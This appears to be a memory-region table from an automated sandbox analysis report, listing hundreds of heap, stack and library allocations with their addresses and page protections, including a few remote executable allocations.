heap
page read and write
B60000
heap
page read and write
3E7000
heap
page read and write
26A000
heap
page read and write
1EBD000
stack
page read and write
939000
heap
page read and write
5F6E000
stack
page read and write
9D8000
heap
page read and write
2414000
heap
page read and write
287000
heap
page read and write
30F000
heap
page read and write
24C0000
heap
page read and write
3814000
heap
page read and write
3FE000
stack
page read and write | page guard
860000
trusted library allocation
page read and write
49C000
heap
page read and write
946000
heap
page read and write
458000
heap
page read and write
3462000
trusted library allocation
page read and write
267000
stack
page read and write
2CF0000
heap
page read and write
4DAE000
stack
page read and write
2A6E000
trusted library allocation
page read and write
4CE000
stack
page read and write
3812000
heap
page read and write
E9C000
stack
page read and write
2BB1000
heap
page read and write
4E6D000
stack
page read and write
E60000
trusted library allocation
page read and write
3BCA000
heap
page read and write
3D0000
trusted library allocation
page execute and read and write
5DFD000
stack
page read and write
237000
heap
page read and write
3BCA000
heap
page read and write
31E000
heap
page read and write
33E000
heap
page read and write
4E53000
heap
page read and write
1BA000
trusted library allocation
page read and write
783000
trusted library allocation
page read and write
3AF000
heap
page read and write
C50000
trusted library allocation
page read and write
104E000
stack
page read and write
317000
heap
page read and write
389000
heap
page read and write
D80000
trusted library allocation
page read and write
1050000
trusted library allocation
page read and write
695F000
heap
page read and write
3801000
heap
page read and write
32A0000
heap
page read and write
380C000
heap
page read and write
4E9C000
heap
page read and write
36E000
heap
page read and write
927000
heap
page read and write
8562000
trusted library allocation
page read and write
3D2000
heap
page read and write
918000
heap
page read and write
486A000
heap
page read and write
45B000
heap
page read and write
3B6B000
heap
page read and write
2DE000
heap
page read and write
2B82000
heap
page read and write
2F70000
heap
page read and write
EB0000
trusted library allocation
page read and write
420000
heap
page read and write
4C7E000
stack
page read and write
2AA000
heap
page read and write
3711000
heap
page read and write
CCE000
stack
page read and write
1CA000
trusted library allocation
page execute and read and write
2B8C000
heap
page read and write
3812000
heap
page read and write
29E000
heap
page read and write
1D0000
trusted library allocation
page read and write
1CAB000
heap
page read and write
380000
trusted library allocation
page read and write
4C9E000
stack
page read and write
E00000
trusted library allocation
page read and write
89000
stack
page read and write
4C9E000
stack
page read and write
91E000
heap
page read and write
472000
heap
page read and write
29E9000
trusted library allocation
page read and write
33F000
heap
page read and write
2AE1000
trusted library allocation
page read and write
AE0000
heap
page read and write
91E000
heap
page read and write
49F000
heap
page read and write
5D6E000
stack
page read and write
909000
heap
page read and write
3791000
trusted library allocation
page read and write
4EAE000
stack
page read and write | page guard
DEC000
stack
page read and write
AEE000
stack
page read and write
1060000
trusted library allocation
page read and write
1E4000
trusted library allocation
page read and write
4B4E000
stack
page read and write
41B000
stack
page read and write
5EA4000
heap
page read and write
20000
heap
page read and write
D3D000
stack
page read and write
147000
stack
page read and write
360000
heap
page read and write
51BE000
stack
page read and write
CB0000
trusted library allocation
page read and write
38A000
heap
page read and write
7590000
trusted library allocation
page read and write
61A000
heap
page read and write
4AEB000
stack
page read and write
109E000
stack
page read and write
1180000
trusted library allocation
page execute and read and write
278000
heap
page read and write
7D9000
trusted library allocation
page read and write
D40000
heap
page read and write
389000
heap
page read and write
A03000
heap
page read and write
52B4000
heap
page read and write
4F70000
heap
page read and write
241F000
stack
page read and write
10000
heap
page read and write
4BDE000
stack
page read and write | page guard
3DE0000
heap
page read and write
37E9000
heap
page read and write
3BBF000
heap
page read and write
28F000
heap
page read and write
112E000
stack
page read and write
285000
trusted library allocation
page execute and read and write
1C60000
heap
page read and write
262000
heap
page read and write
3812000
heap
page read and write
880000
trusted library allocation
page execute and read and write
D00000
trusted library allocation
page read and write
36D4000
heap
page read and write
416000
heap
page read and write
3810000
heap
page read and write
8AF000
stack
page read and write
3BB1000
heap
page read and write
3BF1000
heap
page read and write
9EE000
heap
page read and write
419D000
stack
page read and write
47E9000
heap
page read and write
4E21000
heap
page read and write
3BB4000
heap
page read and write
4881000
heap
page read and write
560000
heap
page read and write
11CB000
stack
page read and write
3F40000
heap
page read and write
4B50000
heap
page read and write
D3F000
stack
page read and write
8F0000
heap
page read and write
3B40000
heap
page read and write
3C32000
heap
page read and write
31E000
stack
page read and write
1D2000
trusted library allocation
page read and write
3C2F000
stack
page read and write
3829000
heap
page read and write
E50000
trusted library allocation
page read and write
282000
trusted library allocation
page read and write
111D000
stack
page read and write
45E000
heap
page read and write
4F0F000
heap
page read and write
45E000
heap
page read and write
BF71000
trusted library allocation
page read and write
1AD000
trusted library allocation
page execute and read and write
2A10000
trusted library allocation
page read and write
34F000
heap
page read and write
3BCA000
heap
page read and write
3BF2000
heap
page read and write
49F000
heap
page read and write
2C6F000
trusted library allocation
page read and write
300000
heap
page read and write
2DDF000
stack
page read and write
260000
trusted library allocation
page execute and read and write
9B71000
trusted library allocation
page read and write
3BFE000
stack
page read and write
3BCA000
heap
page read and write
C20000
trusted library allocation
page read and write
2E90000
heap
page read and write
4769000
heap
page read and write
200000
trusted library allocation
page read and write
1070000
trusted library allocation
page read and write
2BA000
trusted library allocation
page read and write
918000
heap
page read and write
EC0000
trusted library allocation
page read and write
4DCC000
heap
page read and write
279000
heap
page read and write
389000
heap
page read and write
2BC9000
heap
page read and write
CFE000
stack
page read and write
886000
heap
page read and write
7590000
trusted library allocation
page read and write
259000
heap
page read and write
3C31000
heap
page read and write
2CE000
heap
page read and write
C971000
trusted library allocation
page read and write
5DC000
heap
page read and write
2CA000
heap
page read and write
F8E000
stack
page read and write
2E0000
trusted library allocation
page read and write
1BE9000
heap
page read and write
4711000
heap
page read and write
213000
trusted library allocation
page execute and read and write
4EE3000
heap
page read and write
4EEF000
stack
page read and write
9D0000
heap
page read and write
DE0000
trusted library allocation
page read and write
287000
trusted library allocation
page execute and read and write
31B000
heap
page read and write
487C000
heap
page read and write
730F000
stack
page read and write
F0F000
stack
page read and write
35D000
heap
page read and write
320000
heap
page read and write
7590000
trusted library allocation
page read and write
21D000
heap
page read and write
2B60000
heap
page read and write
150000
trusted library allocation
page read and write
478000
remote allocation
page execute and read and write
1C75000
heap
page read and write
2AE0000
heap
page read and write
6BF0000
heap
page read and write
677000
heap
page read and write
27C000
heap
page read and write
4ACA000
stack
page read and write
8073000
trusted library allocation
page read and write
19B000
stack
page read and write
3B67000
heap
page read and write
117E000
stack
page read and write
301E000
stack
page read and write
25BF000
stack
page read and write
3460000
trusted library allocation
page read and write
D0F000
trusted library allocation
page read and write
37E4000
heap
page read and write
300000
heap
page read and write
FCE000
stack
page read and write
83E000
unkown
page read and write
3BB4000
heap
page read and write
4E1E000
stack
page read and write
4DB0000
heap
page read and write
2C0000
trusted library allocation
page read and write
6F1D000
stack
page read and write
521E000
stack
page read and write
1FBF000
stack
page read and write
210000
trusted library allocation
page read and write
446000
heap
page read and write
3BA4000
heap
page read and write
2BB000
heap
page read and write
4B0E000
stack
page read and write
232000
heap
page read and write
4B50000
heap
page read and write
12CF000
stack
page read and write
45D000
heap
page read and write
215000
heap
page read and write
41F000
heap
page read and write
4D30000
heap
page read and write
4F80000
heap
page read and write
1E0000
heap
page read and write
49F000
heap
page read and write
5040000
heap
page read and write
223000
heap
page read and write
24D000
heap
page read and write
3811000
heap
page read and write
3465000
trusted library allocation
page read and write
2C8D000
stack
page read and write
2B9E000
heap
page read and write
C6E000
stack
page read and write
3BBF000
heap
page read and write
3BB4000
heap
page read and write
EA0000
trusted library allocation
page read and write
3BAE000
heap
page read and write
854E000
trusted library allocation
page read and write
42F000
heap
page read and write
428000
heap
page read and write
4F15000
heap
page read and write
5DDE000
stack
page read and write
2A54000
trusted library allocation
page read and write
2B7E000
heap
page read and write
45B000
heap
page read and write
27C000
heap
page read and write
3F0F000
stack
page read and write
457000
heap
page read and write
45E000
heap
page read and write
2B84000
heap
page read and write
694F000
heap
page read and write
B90000
trusted library allocation
page execute and read and write
30B0000
heap
page read and write
31E000
heap
page read and write
902000
heap
page read and write
210000
heap
page read and write
459000
heap
page read and write
1A3000
trusted library allocation
page execute and read and write
BFC000
stack
page read and write
6A9F000
stack
page read and write
FED000
stack
page read and write
4875000
heap
page read and write
22B000
heap
page read and write
2A92000
trusted library allocation
page read and write
49F000
heap
page read and write
1A0000
trusted library allocation
page read and write
5D6E000
stack
page read and write
642000
heap
page read and write
3819000
heap
page read and write
3BF1000
heap
page read and write
670000
heap
page read and write
21D000
trusted library allocation
page execute and read and write
2A81000
heap
page read and write
42B000
heap
page read and write
3BF1000
heap
page read and write
7590000
trusted library allocation
page read and write
2A32000
trusted library allocation
page read and write
214000
heap
page read and write
4C2F000
stack
page read and write
926000
heap
page read and write
30000
heap
page read and write
36B000
heap
page read and write
363000
heap
page read and write
E62000
trusted library allocation
page read and write
2410000
heap
page read and write
4E28000
heap
page read and write
52CF000
stack
page read and write
926000
heap
page read and write
47C0000
heap
page read and write
2A52000
trusted library allocation
page read and write
3BA7000
heap
page read and write
12CE000
stack
page read and write
27CC000
trusted library allocation
page read and write
35A000
heap
page read and write
6171000
trusted library allocation
page read and write
EA0000
trusted library allocation
page read and write
20000
heap
page read and write
380C000
heap
page read and write
2C20000
trusted library allocation
page read and write
382A000
heap
page read and write
3E0000
trusted library allocation
page read and write
33FB000
trusted library allocation
page read and write
3A000
heap
page read and write
249000
heap
page read and write
2A7000
heap
page read and write
4B3E000
stack
page read and write
2B9A000
heap
page read and write
FAE000
stack
page read and write
2B32000
trusted library allocation
page read and write
6920000
heap
page read and write
2998000
trusted library allocation
page read and write
2BC9000
heap
page read and write
241000
heap
page read and write
508000
heap
page read and write
2DB000
heap
page read and write
13C000
stack
page read and write
7590000
trusted library allocation
page read and write
1C70000
heap
page read and write
2BA4000
heap
page read and write
2DF000
heap
page read and write
EC0000
heap
page execute and read and write
370F000
stack
page read and write
2B0000
heap
page read and write
5B0000
heap
page read and write
3B79000
heap
page read and write
33FF000
stack
page read and write
D10000
trusted library allocation
page read and write
104E000
stack
page read and write | page guard
946000
heap
page read and write
2290000
heap
page read and write
850000
trusted library allocation
page read and write
10000
heap
page read and write
2791000
trusted library allocation
page read and write
3824000
heap
page read and write
3812000
heap
page read and write
37DC000
heap
page read and write
4910000
trusted library allocation
page read and write
5FE0000
heap
page read and write
270000
trusted library allocation
page read and write
4869000
heap
page read and write
383000
heap
page read and write
F00000
trusted library allocation
page execute and read and write
1A4000
trusted library allocation
page read and write
382000
trusted library allocation
page read and write
10DE000
stack
page read and write
9DD000
heap
page read and write
2DEF000
stack
page read and write
4910000
trusted library allocation
page read and write
3D0000
trusted library allocation
page execute and read and write
720F000
stack
page read and write
91E000
heap
page read and write
840000
trusted library allocation
page read and write
C60000
trusted library allocation
page read and write
108F000
stack
page read and write
37B9000
trusted library allocation
page read and write
304000
heap
page read and write
39E000
heap
page read and write
2CFB000
heap
page read and write
3C30000
heap
page read and write
458000
heap
page read and write
220000
heap
page read and write
37F1000
heap
page read and write
909000
heap
page read and write
1BE5000
heap
page read and write
3BC000
heap
page read and write
232000
heap
page read and write
4BEE000
stack
page read and write
466000
heap
page read and write
3832000
heap
page read and write
7590000
trusted library allocation
page read and write
8564000
trusted library allocation
page read and write
37E1000
heap
page read and write
DA0000
trusted library allocation
page read and write
27D6000
trusted library allocation
page read and write
520D000
stack
page read and write
4D3D000
stack
page read and write
B5E000
stack
page read and write
36B000
heap
page read and write
2BC9000
heap
page read and write
820000
remote allocation
page read and write
3B0000
trusted library allocation
page execute and read and write
474000
remote allocation
page execute and read and write
22A000
trusted library allocation
page read and write
3F49000
heap
page read and write
874000
heap
page read and write
BDE000
stack
page read and write
3710000
heap
page read and write
3BB6000
heap
page read and write
926000
heap
page read and write
218000
heap
page read and write
200000
trusted library allocation
page read and write
314000
heap
page read and write
37B9000
trusted library allocation
page read and write
D10000
trusted library allocation
page read and write
128E000
stack
page read and write
7550000
heap
page read and write
3B70000
heap
page read and write
D90000
trusted library allocation
page read and write
165000
stack
page read and write
490000
heap
page read and write
29F6000
trusted library allocation
page read and write
918000
heap
page read and write
918000
heap
page read and write
1E3000
trusted library allocation
page execute and read and write
4F12000
heap
page read and write
3821000
heap
page read and write
DF0000
heap
page execute and read and write
3812000
heap
page read and write
F3E000
stack
page read and write
3B6E000
stack
page read and write
3BB9000
heap
page read and write
340000
heap
page read and write
C70000
trusted library allocation
page read and write
10DA000
stack
page read and write
367000
heap
page read and write
C30000
trusted library allocation
page read and write
49B000
heap
page read and write
249000
heap
page read and write
902000
heap
page read and write
31E000
heap
page read and write
918000
heap
page read and write
6A5F000
stack
page read and write
36E0000
heap
page read and write
18A000
stack
page read and write
3110000
heap
page read and write
22C6000
heap
page read and write
4BDF000
stack
page read and write
2DD000
stack
page read and write
3FF000
stack
page read and write
38E0000
trusted library allocation
page read and write
D20000
trusted library allocation
page read and write
3843000
heap
page read and write
385000
trusted library allocation
page execute and read and write
91E000
heap
page read and write
750C000
stack
page read and write
45B000
heap
page read and write
616E000
stack
page read and write
360000
trusted library allocation
page read and write
940000
trusted library allocation
page read and write
3BF1000
heap
page read and write
4CCD000
heap
page read and write
2D9000
heap
page read and write
2EB000
heap
page read and write
2F3D000
stack
page read and write
366000
heap
page read and write
245C000
stack
page read and write
249000
heap
page read and write
29F2000
trusted library allocation
page read and write
288000
heap
page read and write
902000
heap
page read and write
10000
heap
page read and write
CF0000
trusted library allocation
page read and write
7590000
trusted library allocation
page read and write
2D6000
heap
page read and write
3C3B000
heap
page read and write
B571000
trusted library allocation
page read and write
7100000
heap
page read and write
49B000
heap
page read and write
31B000
heap
page read and write
251F000
stack
page read and write
2B5D000
trusted library allocation
page read and write
4BEE000
stack
page read and write
406D000
stack
page read and write
3BB1000
heap
page read and write
926000
heap
page read and write
299000
heap
page read and write
1290000
trusted library allocation
page read and write
3B9000
heap
page read and write
BE0000
trusted library allocation
page read and write
1F0000
heap
page read and write
C2E000
stack
page read and write
9CD000
stack
page read and write
D20000
trusted library allocation
page read and write
4D34000
heap
page read and write
3B6B000
heap
page read and write
382F000
heap
page read and write
486D000
heap
page read and write
42F9000
trusted library allocation
page read and write
29E1000
trusted library allocation
page read and write
454000
heap
page read and write
C1F000
stack
page read and write
7590000
trusted library allocation
page read and write
20000
heap
page read and write
5E00000
heap
page read and write
2BE000
heap
page read and write
3F45000
heap
page read and write
243000
heap
page read and write
356000
heap
page read and write
3B6E000
heap
page read and write
652000
heap
page read and write
DF6000
heap
page execute and read and write
850000
heap
page read and write
4EAF000
stack
page read and write
377000
heap
page read and write
6ADD000
stack
page read and write
1080000
trusted library allocation
page execute and read and write
226000
heap
page read and write
486A000
heap
page read and write
EC6000
heap
page execute and read and write
3BA5000
heap
page read and write
701D000
stack
page read and write
3BD0000
heap
page read and write
12EE000
stack
page read and write
38CE000
stack
page read and write
F9E000
stack
page read and write
4B72000
heap
page read and write
BB0000
heap
page read and write
3BF1000
heap
page read and write
490000
heap
page read and write
2E0000
heap
page read and write
40A000
heap
page read and write
10000
heap
page read and write
3BAF000
heap
page read and write
31B000
heap
page read and write
26B000
heap
page read and write
28CB000
trusted library allocation
page read and write
3C5000
heap
page read and write
3B71000
heap
page read and write
A01000
heap
page read and write
2ACF000
stack
page read and write
5040000
heap
page read and write
531E000
stack
page read and write
1C7000
trusted library allocation
page execute and read and write
5FF1000
heap
page read and write
5050000
heap
page read and write
7590000
trusted library allocation
page read and write
4B54000
heap
page read and write
130E000
stack
page read and write
220000
trusted library allocation
page read and write
2BC9000
heap
page read and write
367000
heap
page read and write
235000
heap
page read and write
2C7000
heap
page read and write
31B000
heap
page read and write
389000
heap
page read and write
7590000
trusted library allocation
page read and write
282E000
trusted library allocation
page read and write
789000
trusted library allocation
page read and write
820000
remote allocation
page read and write
526E000
stack
page read and write
2CF4000
heap
page read and write
26F000
heap
page read and write
216000
heap
page read and write
740F000
stack
page read and write
3843000
heap
page read and write
1C65000
heap
page read and write
90B000
heap
page read and write
3FB000
heap
page read and write
2A8E000
trusted library allocation
page read and write
3BCA000
heap
page read and write
31CE000
stack
page read and write
4EC7000
heap
page read and write
3B3C000
stack
page read and write
2EB000
heap
page read and write
2A1000
trusted library allocation
page read and write
430000
trusted library allocation
page read and write
4882000
heap
page read and write
2C8E000
trusted library allocation
page read and write
3C8000
heap
page read and write
280000
trusted library allocation
page read and write
4D52000
heap
page read and write
4EEE000
stack
page read and write | page guard
2B81000
heap
page read and write
28CA000
trusted library allocation
page read and write
10000
heap
page read and write
3F5E000
stack
page read and write
57E000
stack
page read and write
3BB4000
heap
page read and write
926000
heap
page read and write
29D000
heap
page read and write
EC0000
heap
page execute and read and write
91E000
heap
page read and write
2791000
trusted library allocation
page read and write
21A000
heap
page read and write
24E2000
heap
page read and write
380000
trusted library allocation
page read and write
432000
heap
page read and write
334000
heap
page read and write
104F000
stack
page read and write
2E50000
heap
page read and write
2B90000
trusted library allocation
page read and write
31D000
heap
page read and write
2B54000
trusted library allocation
page read and write
1F10000
heap
page read and write
2BC9000
heap
page read and write
5A0000
heap
page read and write
3791000
trusted library allocation
page read and write
3CEC000
stack
page read and write
4C2E000
stack
page read and write
7590000
trusted library allocation
page read and write
7590000
trusted library allocation
page read and write
10000
heap
page read and write
330000
heap
page read and write
27D4000
trusted library allocation
page read and write
486A000
heap
page read and write
39F000
heap
page read and write
2CF8000
heap
page read and write
3BCA000
heap
page read and write
2C1C000
trusted library allocation
page read and write
446000
stack
page read and write
3BAD000
heap
page read and write
C40000
trusted library allocation
page read and write
3464000
trusted library allocation
page read and write
494000
heap
page read and write
2A98000
trusted library allocation
page read and write
6CE0000
heap
page read and write
386000
heap
page read and write
3BA4000
heap
page read and write
D30000
trusted library allocation
page read and write
2A70000
heap
page read and write
3A8000
heap
page read and write
3B8000
heap
page read and write
2A71000
trusted library allocation
page read and write
2B5000
trusted library allocation
page read and write
325F000
stack
page read and write
1F20000
direct allocation
page read and write
2EB000
heap
page read and write
318000
heap
page read and write
3AB000
heap
page read and write
4AAE000
stack
page read and write
AB71000
trusted library allocation
page read and write
926000
heap
page read and write
2E9000
trusted library allocation
page read and write
52D2000
heap
page read and write
CBD000
stack
page read and write
3BCA000
heap
page read and write
382000
heap
page read and write
4F20000
heap
page read and write
2AB1000
trusted library allocation
page read and write
24A000
heap
page read and write
25FF000
stack
page read and write
92B000
heap
page read and write
1D5000
trusted library allocation
page execute and read and write
1B0000
trusted library allocation
page read and write
502E000
stack
page read and write
318000
heap
page read and write
119E000
stack
page read and write
280000
heap
page read and write
27C000
heap
page read and write
3843000
heap
page read and write
3EA000
heap
page read and write
393000
heap
page read and write
918000
heap
page read and write
27AF000
trusted library allocation
page read and write
6E1F000
stack
page read and write
37E000
heap
page read and write
F10000
heap
page execute and read and write
3843000
heap
page read and write
3BCB000
heap
page read and write
D00000
trusted library allocation
page read and write
487B000
heap
page read and write
16A000
stack
page read and write
45E000
heap
page read and write
5EC2000
heap
page read and write
7FA000
trusted library allocation
page read and write
210000
trusted library allocation
page read and write
3BED000
heap
page read and write
389000
heap
page read and write
FCE000
stack
page read and write
487E000
heap
page read and write
903000
heap
page read and write
2BA6000
heap
page read and write
42B000
heap
page read and write
44A000
stack
page read and write
3C81000
heap
page read and write
DEF000
stack
page read and write
1E0000
trusted library allocation
page read and write
2E3E000
stack
page read and write
E5E000
stack
page read and write
220000
heap
page read and write
10000
heap
page read and write
7F0000
trusted library allocation
page read and write
60BE000
stack
page read and write
16B000
stack
page read and write
A50000
heap
page read and write
450000
heap
page read and write
150000
trusted library allocation
page read and write
1F4F000
stack
page read and write
2DF000
heap
page read and write
693D000
heap
page read and write
3FE000
heap
page read and write
9C000
stack
page read and write
610000
heap
page read and write
37F4000
heap
page read and write
265E000
stack
page read and write
CC0000
heap
page execute and read and write
4871000
heap
page read and write
227000
heap
page read and write
1EFE000
stack
page read and write
7590000
trusted library allocation
page read and write
45A000
heap
page read and write
566000
heap
page read and write
3BC2000
heap
page read and write
7171000
trusted library allocation
page read and write
2EAC000
heap
page read and write
D90000
trusted library allocation
page read and write
F5B000
stack
page read and write
41F000
heap
page read and write
E4E000
stack
page read and write
3CD000
stack
page read and write
1060000
heap
page execute and read and write
2D3000
heap
page read and write
1BE000
stack
page read and write
2B7D000
heap
page read and write
4FDF000
stack
page read and write
41B000
heap
page read and write
4400000
heap
page read and write
2A33000
trusted library allocation
page read and write
487C000
heap
page read and write
D30000
heap
page read and write
2DF000
heap
page read and write
7B71000
trusted library allocation
page read and write
360000
heap
page read and write
90B000
heap
page read and write
20F000
stack
page read and write
2AC0000
trusted library allocation
page read and write
1EC000
stack
page read and write
ECE000
stack
page read and write
212000
trusted library allocation
page read and write
D40000
heap
page read and write
EB0000
trusted library allocation
page read and write
358000
heap
page read and write
2A72000
trusted library allocation
page read and write
4749000
heap
page read and write
206000
stack
page read and write
52B0000
heap
page read and write
9FE000
heap
page read and write
2B89000
heap
page read and write
E00000
trusted library allocation
page execute and read and write
3BB4000
heap
page read and write
CEE000
stack
page read and write
37E0000
heap
page read and write
5C5000
heap
page read and write
358000
heap
page read and write
292000
heap
page read and write
C6E000
stack
page read and write
3BD3000
heap
page read and write
8E0000
trusted library allocation
page read and write
2A52000
trusted library allocation
page read and write
27F4000
trusted library allocation
page read and write
29CF000
stack
page read and write
121F000
stack
page read and write
BC000
stack
page read and write
35F6000
heap
page read and write
D80000
trusted library allocation
page read and write
27AA000
trusted library allocation
page read and write
38D000
heap
page read and write
120E000
stack
page read and write
4F7E000
stack
page read and write
DF0000
trusted library allocation
page read and write
90B000
heap
page read and write
2E7000
trusted library allocation
page read and write
605E000
stack
page read and write
3BA5000
heap
page read and write
2B9E000
heap
page read and write
1ED000
trusted library allocation
page execute and read and write
275F000
stack
page read and write
2C73000
trusted library allocation
page read and write
399000
heap
page read and write
38F9000
trusted library allocation
page read and write
4E75000
heap
page read and write
D2D000
stack
page read and write
1BE0000
heap
page read and write
35C0000
heap
page read and write
6B71000
trusted library allocation
page read and write
3BC000
heap
page read and write
25E000
heap
page read and write
7590000
trusted library allocation
page read and write
503E000
stack
page read and write
329C000
stack
page read and write
7D0000
trusted library allocation
page read and write
42DF000
stack
page read and write
116E000
stack
page read and write
318000
heap
page read and write
4AAE000
stack
page read and write
3B6E000
heap
page read and write
4CB0000
heap
page read and write
3BB1000
heap
page read and write
1C9B000
heap
page read and write
53E000
stack
page read and write
29FB000
trusted library allocation
page read and write
3CF000
heap
page read and write
3463000
trusted library allocation
page read and write
2BC9000
heap
page read and write
3AE000
heap
page read and write
420000
heap
page read and write
35EF000
stack
page read and write
3420000
heap
page read and write
36A000
trusted library allocation
page read and write
7D0000
trusted library allocation
page read and write
890000
trusted library allocation
page read and write
BD0000
trusted library allocation
page read and write
3A6000
heap
page read and write
2CCF000
stack
page read and write
3791000
trusted library allocation
page read and write
7590000
trusted library allocation
page read and write
37FF000
heap
page read and write
4710000
heap
page read and write
214000
trusted library allocation
page read and write
7590000
trusted library allocation
page read and write
3BC000
heap
page read and write
343000
heap
page read and write
3461000
trusted library allocation
page read and write
DA0000
trusted library allocation
page read and write
5CED000
stack
page read and write
8171000
trusted library allocation
page read and write
39FF000
stack
page read and write
850D000
trusted library allocation
page read and write
2B2F000
trusted library allocation
page read and write
9C0000
heap
page read and write
2E7000
heap
page read and write
DF0000
trusted library allocation
page read and write
12A0000
trusted library allocation
page read and write
3843000
heap
page read and write
7590000
trusted library allocation
page read and write
8D5000
heap
page read and write
909000
heap
page read and write
2AF2000
trusted library allocation
page read and write
27D2000
trusted library allocation
page read and write
246000
heap
page read and write
455F000
stack
page read and write
160000
heap
page read and write
2B8000
heap
page read and write
9171000
trusted library allocation
page read and write
2BBB000
heap
page read and write
4DE9000
heap
page read and write
24C4000
heap
page read and write
F60000
trusted library allocation
page execute and read and write
615000
heap
page read and write
26E000
heap
page read and write
2EA000
heap
page read and write
1F7000
heap
page read and write
4ED3000
heap
page read and write
37DC000
heap
page read and write
232E000
stack
page read and write
4F2E000
stack
page read and write
830000
trusted library allocation
page read and write
6964000
heap
page read and write
458000
heap
page read and write
A171000
trusted library allocation
page read and write
395000
heap
page read and write
4B3D000
stack
page read and write
857000
heap
page read and write
42C000
heap
page read and write
407000
heap
page read and write
3950000
heap
page read and write
8FC000
stack
page read and write
2CAE000
stack
page read and write
47E8000
heap
page read and write
10000
heap
page read and write
41F000
heap
page read and write
2BB000
heap
page read and write
8DB000
stack
page read and write
2D6000
heap
page read and write
25F000
heap
page read and write
3824000
heap
page read and write
37FA000
heap
page read and write
8BA000
heap
page read and write
3B8000
trusted library allocation
page read and write
33B000
heap
page read and write
887000
heap
page read and write
54E000
stack
page read and write
3C39000
heap
page read and write
5A7000
heap
page read and write
3B72000
heap
page read and write
37F9000
heap
page read and write
64E000
heap
page read and write
2791000
trusted library allocation
page read and write
290000
heap
page read and write
4CA0000
heap
page read and write
257000
stack
page read and write
23E000
heap
page read and write
36D0000
heap
page read and write
210000
heap
page read and write
27C000
heap
page read and write
31A000
heap
page read and write
2B81000
heap
page read and write
372000
heap
page read and write
780000
trusted library allocation
page read and write
BC0000
heap
page read and write
487C000
heap
page read and write
2BA3000
heap
page read and write
2AE000
trusted library allocation
page read and write
C3E000
stack
page read and write
90B000
heap
page read and write
3BDE000
heap
page read and write
37F4000
heap
page read and write
8AB000
heap
page read and write
413000
heap
page read and write
20A000
stack
page read and write
62F000
heap
page read and write
4910000
trusted library allocation
page read and write
3A2000
heap
page read and write
29AD000
trusted library allocation
page read and write
8B0000
trusted library allocation
page read and write
37B9000
trusted library allocation
page read and write
91E000
heap
page read and write
5EA0000
heap
page read and write
909000
heap
page read and write
3BB2000
heap
page read and write
36E1000
heap
page read and write
253000
heap
page read and write
6B00000
heap
page read and write
3660000
heap
page read and write
There are 951 hidden memdumps, click here to show them.